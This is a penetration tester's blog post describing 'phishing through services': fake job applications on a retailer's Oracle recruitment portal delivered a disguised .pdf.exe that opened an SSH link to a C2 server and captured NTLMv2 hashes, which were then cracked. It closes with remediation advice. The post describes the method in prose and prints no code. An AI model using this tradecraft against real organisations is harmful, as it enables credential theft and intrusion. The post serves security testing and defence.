top of page
Search

Phishing through Services (PtS)

Most organisations these days are very familiar with phishing and Spear Phishing campaigns and are typically included in annual Penetration Testing activities.


Although we often yield a great degree of success with these attacks, we think outside the box and do things differently at Nexon when it comes to pentests, to really give our clients a true threat assessment and understanding of their risk profile.  Phishing is a must, but it only presents 50% of the picture...


Have you heard about Phishing through services (or what we call PTS testing)? it encompasses the same features of targeted phishing attacks, in that we still generate documents or payloads (files), containing a payload that either connects our custom malware to our Command and Control Infrastructure (C2) (to facilitate access) or harvest data such as credentials, tokens or hashes, but instead of trying to bypass email filtering (and having hit and miss results) we distribute our attack through the organisations own external services, such as cloud services that face the outside world.


To understand why PTS is effective, most organisations these days have a pretty solid mail security infrastructure, yes we can still bypass email filtering and get emails delivered, but it’s getting more and more difficult, it also limits what sort of attacks/payloads we can send though, and there is the challenge of consistency, some emails get through, some don’t, and then there is user awareness, these days staff are very used to looking for indicators of phishing and they get warnings in their outlook / mail client that the email 'stems from an outside address and to be suspicious and not click on links' (as the typical corporate banner presents to them in email) .  PTS is also very successful because 95% of the time organisation’s whitelist their SaaS platforms in their email filtering, allowing notifications and emails to deliver directly to staff without inspection or interruption.  PTS also is an area that most training programs miss, organisations typically train staff on identifying phishing and smishing, QR codes and vishing risks, but not about inherent risks from exploitation of legitimate business systems and processes, were talking about the unexpected, or known unknowns. 


Most organisations typically have 2 levels of email filtering as a minimum, typically M365/Entra (or g-suite) and 1 other, for example Proofpoint, Mimecast, MailGuard etc.  As part of standard mail server best practices, most organisations now utilise SPF, DKIM, & DMARC which work together to authenticate email senders and messages, preventing phishing and cyberattacks by verifying that emails are legitimate and haven't been tampered with.  Then we have domain reputation, whereby if a newly spun up domain appears and an organisation starts receiving email from the domain, its often not trusted by mail filtering for the first 30-60 days (making phishing harder) and then there is blacklisting of domains and IP's that can play a part in success as well.

 

So as you can see there are a lot of factors in play when it comes to phishing.  So when it comes to PTS what sort of services are we talking about?  The services that work well for me:

  • Recruitment Platforms - Self Explanatory, where CV's, Cover letters etc can be uploaded.

  • Permit and WHS/OHS systems - Where people can upload permits and safety forms / requests for on-site requirements (I commonly find this at shipping terminals, refineries and processing plants).

  • Survey Sites - Some organisations post surveys for employees (and sometimes the wider public) to respond to, often these have file upload areas.

  • Portfolio / Showcase Platforms - For creative professionals (designers, artists, photographers) to showcase their work (images, PDFs, video links). Anyone can create an account and upload their portfolio or images.

  • Journalism/Citizen Reporting Platforms - Some news organisations or investigative journalism initiatives use custom-built or specialized SaaS platforms that allow the public to securely submit documents, photos, or videos related to a story, for example whistleblowing.  These days it is not uncommon to find that organisations have a whistleblower public web service that can be utilised.

  • Contest/Competition Platforms - Platforms that host online contests (e.g., writing competitions, photography contests, design challenges) often allow users to register and upload their entries. These might be general platforms or specialised for specific types of contests.

  • Fan-fiction/Writing Communities - Platforms where writers can upload their stories, poems, or other creative writing for example Wattpad.

  • Crowdsourcing/Citizen Science Platforms - Some projects involve public contributions of data or documents (e.g., historical document transcription, environmental data submission etc). These platforms often have specific forms and allow uploads. Then there is the;

  • Standard File Request & Secure Drop-off Services - such as dropbox file requests, google forms (with file upload functionality), ShareFile, files.com etc and custom file transfer services built / employed by organisations.

  • E-commerce Platforms and customer service platforms - for example, often there is an order support bot, form or email address for retailers where people can submit order issues /  requests.

  • Local Council Request forms - Nearly all councils have request forms where people can submit requests for maintenance or to address / log hazards, submit customer requests and other details, these have worked very well for me in the past.

 

I think you get the picture... there are lots of platforms that are readily available for abuse if not safeguarded appropriately.

In a recent engagement for a large retailer, they were presenting a number of positions via an Oracle cloud recruitment platform.  Most major retailers here in Australia use Oracle Cloud for recruitment, and universities often lean towards Workday.

 

Here is an example of a job posting hosted on Oracle Cloud:

Job position example
Job position example

I applied for many roles within the same organisation (around 10), all with different personas.  Why not just choose 1 or 2? 


If I submit a single request with a malicious file, HR teams / Recruitment teams often will view the application as an issue with a single person’s CV or file, which is isolated to that person.  Whereas if the issue starts getting seen across a large number of submissions, it is almost always seen as a ‘system’ issue which then forces further investigation by the organisation, this in turn results in payloaded files being sent to multiple people in an organisation to ‘test’.


For my myriad of persona’s, I utilised a mixture of:

  • Different domains (I purchased 8 different domains)

  • Different email platforms -  8 were setup for use with M365 as the sending system, but 1 was setup as a standard gmail account (@gmail.com), and 1 a protonmail address, to look independent and to ensure it looks like a system issue.

  • Different email formats & Stationary

  • Different Names

  • Different Sexes

  • Different Phone numbers

  • Different Locations/ Addresses (I made sure all addresses were within 20 kilometres of the role location for maximum HR interest)

  • Different Countries (as large retailers will have multiple recruitment team members in different regions)

  • Different CV and cover letter formats

  • Different people images

 

I then utilised office to create various CV’s.  The actual CV and cover letter content was generated with AI, but the CV’s themselves were built from scratch using the generated content.  It’s VERY time consuming and slow when it comes to building nice CVs, but to make it as a realistic as possible, it requires lots of effort.  Once the content was generated, I’d then overlay them with a blurry image, and then overlay again with my images and content.  In this phish, I utilised the Oracle image branding to make it seem like a platform error, with a link enticing the user to access the original content.


Here are some examples of the CV’s and cover letters I created. 

CV Example
CV Example
Cover letter example
Cover letter example
CV Example
CV Example
CV Example
CV Example
CV Example
CV Example

The links in the ‘error messages’ when executed would prompt the user to download the zip file (from a hosted web server I am hosting):

Download zip
Download zip

 

And Once Opened, they would be presented with either an exe, a html file or both.

zip contents
zip contents

If the user chose to extract the .pdf.exe file, it would look like a legitimate PDF file:

Adobe icon
Adobe icon

Once run (either form the zip or an extracted file) a PowerShell process actually generates a PDF and presents at the front of all apps:

Now behind the scenes, we have a lot going on.  Firstly, we have a Command and Control Server (C2) listening for SSH connections.  SSH was inbuilt into later versions of windows 10 and Windows 11 by default and automatically enabled by Microsoft unless you specifically choose to disable / remove the feature.  95% or organisations don’t even know this exists, let alone to disable it.  The shellcode in the file establishes an SSH connection to the C2 and completely bypasses ALL endpoint protection (EDR), it’s a legitimate windows process, so its seen as legit.  Once established it sends a copy of the users NTLMv2 hash to my C2 server (via a Metasploit SMB listener) and establishes the separate channel where I can give instruction to the endpoint machine.


To be OPSec safe and avoid detection, we don’t execute commands that would be picked up by EDR, only to gather information such as system information and username details as a Proof of Concept (PoC).  The most important part is the NTLMv2 hash, that’s the main data we want.


So what is an NTLMv2 hash?  Lets get a bit technical for a minute.  Although Microsoft's preferred authentication protocol for Active Directory domains is Kerberos, NTLMv2 is still widely used and enabled at most organisations, often as a fallback or for compatibility with legacy systems, workgroup environments, and specific applications.

The hash itself isn’t a direct hash of your password in the way a simple hash would be. Instead, it's a complex calculation that incorporates the NT hash of the user's password (an MD4 hash of the user's Unicode password, which is stored on the domain controller or local SAM database), a server challenge (the random number sent by the server), a client challenge (a random value generated by the client, which often includes a timestamp and other data) and the username and domain name.


In terms of the Windows world, its typically used for verifying a users identity. When a client attempts to access a resource (like a shared folder, an application, or a remote desktop session) on a Windows network, the NTLMv2 hash is used to prove that the client knows the correct password associated with the account, without ever transmitting the actual password in plain text.  It is also used in Single Sign-On (SSO) in some contexts, NTLMv2 contributes to SSO by allowing a user to authenticate once and then access multiple resources without re-entering credentials.


From an attackers perspective we LOVE NTLMv2 hashes, we can use them in Pass-the-Hash (PtH) Attacks, in Relay Attacks and they can be cracked offline using tools such as Hashcat.


My attack was indeed successful, returning a large number of hashes.  Here is some of the hashes we received:

hashes
hashes

With the hashes in hand, I ran these through Hashcat (password cracker) utilising GPU’s and mutated Wordlists, successfully recovering 3 hashes:

Cracking hashes with Hashcat
Cracking hashes with Hashcat

This in turn provided the plain text password for the users.  Now 2 of the accounts were HR staff (to be expected) but the other was for the actual Oracle Administrator who works in IT! 

As predicted, the multiple appearances of the ‘error’ caused the recruitment team to send this to the Oracle Admin to investigate, who in turn handed over his hash during his investigation.


Pretty cool hey?  As you can see PTS can be devastatingly successful.

 

Once we have clear text credentials, I will then perform  one or many of the following activities:

  • Credential Stuffing attacks (try to log into all the orgs services to see where it works) and if they MFA.

  • Attempt bypass of MFA, for example for cloud services like M365, utilising MSGraph or other Entra endpoints or launching an MFA exhaustion attack (constantly hassle the user with MFA prompts till they accept)

  • Utilise the password in other attacks such as connecting to their WPA2-Ent wireless network (AD/Radius Authentication) or in a physical attack, such as plugging in an implant, USB device or rogue device with local network access and then using the creds to access company resources.

 

In this instance, the client was very mature from a security side and had employed MFA on every service they had, combined with SSO and other security controls, preventing our ability to use the credentials from outside or remotely from the network.


We then worked with the client to launch additional similar attacks targeting their customer orders / support team and performed a physical pentest, bypassing reception and implanting a rogue device into a network point inside their office and then accessed this device remotely, to perform further testing using the account and local network access, thereby giving them a real threat assessment exploring multiple avenues of exploitation.


At this stage, lets call out remediation / mitigation activities to prevent this attack and future attacks:

 

Outside The Network

  • MFA on everything and applied to every user and service.

  • Implement platform-side endpoint protection / file upload scanning (EDR), to detect files containing potentially malicious content being uploaded to SaaS services.

  • Ensure detection mechanisms are extended to incorporate cloud services, to detect indicators of attack via these platforms, or pre-staging attacks via these platforms in preparation for a larger attack.  In the case of this attack above, I successfully obtained a number of user password hashes without SOC detection as they were only monitoring M365, Datacentres and local networks.

  • Ensure that submissions made to these platforms do not send the submitted content via email with a whitelist applied.  All email notifications / submissions should route through the organisations mail filtering controls, to detect for malicious content and impersonation attacks.

 

Inside the network

  • Prioritise Kerberos for authentication, disabling / limiting NTLMv2 usage.

  • Employ strong password controls, implementing banned password lists, passphrases and 12 or greater characters (follow NIST recommendations)

  • Enable NTLM Mitigations - Configure server signing and Extended Protection for Authentication (EPA) on relevant servers to mitigate NTLM relay attacks.

  • Standard housekeeping, Regular patching of systems, XDR adoption, SOC and SIEM etc.

  • Consider adopting Deep Packet Inspection (DPI)/ SSL Inspection on the network, combined with IPS to prevent communication via C2 channels.

  • Ensure all staff are utilising local EDR/XDR both on company issues devices and personal devices (if BYOD is allowed).


Processes and Staff

  • Training of staff on PTS attacks, in particular HR/Recruitment and frontline support staff such as customer service along with standard end user training relating to current threats, such as Deepfakes, AI, QR phishing etc.

  • Implement processes to reject/vet documents or submissions containing potentially malicious content.

  • IT should have documented processes for vetting of User password reset and MFA reset requests

 

These are the types of advanced attacks you can expect from any red team assessment or advanced pentest with my team 😊

 

In my next blog, I’ll talk about another service we offer and execute for pentest customers, reconnaissance / OSINT exercises and threat assessments of Exec Team and Board Members.  Where we perform, basically a personal pentest, to profile exec and board members to determine attack avenues that could be utilised to compromise these individuals and their access to the  organisations network, stay tuned!

 

Lastly, if you want to see what your threat profile looks like with a next-level pentest from Australia’s best pentest team, exploring out of the box attack avenues, please reach out!  pentestenquiries@corp.nexon.com.au 

 
 
 

Comments

DW

© 2024 Dan Weis

danweis.me

bottom of page